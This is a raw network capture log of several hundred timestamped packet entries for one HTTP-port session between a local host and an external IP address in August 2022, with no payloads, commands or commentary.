Aug 23, 2022 18:24:03.278306961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278311014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278316021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278341055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278354883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278359890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278377056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278403997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278429031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278444052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278448105 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278450012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278450966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278461933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278476000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278501987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278526068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278537989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278542995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278546095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278548002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278573036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278597116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278609991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278614044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278615952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278620005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278640985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278662920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278685093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278687954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278692007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278695107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278707981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278708935 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278731108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278753042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278764963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278769016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278770924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278776884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278800964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278824091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278837919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278841972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278846025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278848886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278872013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278894901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278907061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278911114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278913021 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278918982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278942108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278965950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.278978109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278981924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278985023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.278990030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279012918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279033899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279055119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279056072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279059887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279062033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279077053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279098034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279117107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279119968 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279119968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279124022 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279144049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279166937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279186964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279187918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279191017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279195070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279210091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279232025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279257059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279258013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279262066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279263973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279267073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279280901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279303074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279316902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279320955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279325962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279377937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279393911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279397964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279412985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279436111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279458046 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279476881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279480934 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279480934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279483080 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279485941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279503107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279525042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279539108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279545069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279548883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279571056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279572964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279597044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279620886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279630899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279634953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279638052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279645920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279668093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279689074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279701948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279706955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279709101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279710054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279736042 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279759884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279779911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279783010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279783964 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279786110 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279808998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279834986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279844999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279849052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279850006 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279859066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279882908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279906034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279917955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279922009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279925108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279931068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279956102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279978991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.279990911 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279995918 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.279998064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280005932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280030966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280052900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280065060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280069113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280071020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280076027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280101061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280123949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280137062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280141115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280143976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280148029 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280172110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280195951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280220032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280220985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280224085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280225992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280227900 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280245066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280267000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280277967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280289888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280312061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280327082 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280330896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280333996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280334949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280338049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280356884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280380011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280390024 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280405998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280407906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280411005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280426979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280448914 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280451059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280473948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280497074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280500889 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280513048 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280515909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280522108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.280556917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.280560970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.300039053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.301276922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.318789005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.318847895 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.321851969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.321914911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.321954012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.321991920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.322011948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.322024107 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.322029114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.322033882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.322068930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.322104931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.322146893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.322158098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.322165012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.323019028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.324758053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324804068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324831009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324846983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324862957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324877977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324896097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.324984074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.324994087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.324999094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326457024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326565981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326723099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326756954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326781034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326802969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326809883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326814890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326836109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326858044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326879025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326896906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326901913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.326920033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326951027 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326982975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.326996088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327001095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327006102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327029943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327052116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327079058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327092886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327097893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327100992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327128887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327161074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327191114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327203035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327207088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327210903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327239990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327266932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327297926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327311993 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327317953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327321053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327370882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327383041 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327416897 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327438116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327466011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327478886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327485085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327490091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327516079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327543020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327575922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327590942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327596903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327600002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327621937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327651978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327682972 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327692986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327697039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327702045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327733040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327764034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327790976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327802896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327807903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327812910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327841997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327869892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327898979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327909946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327914953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327920914 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.327946901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.327985048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328005075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328011036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328037024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328059912 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328082085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328094959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328099012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328123093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328152895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328174114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328197956 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328221083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328233957 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328260899 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328283072 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328305006 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328309059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328311920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328320026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328341961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328361988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328387022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328394890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328398943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328402042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328403950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328423023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328452110 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328464031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328468084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328495979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328525066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328548908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328566074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328572989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328577042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328602076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328636885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328649044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328679085 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328685045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328711987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328746080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328783989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328788042 CEST	49844	80	192.168.2.3	77.91.103.222
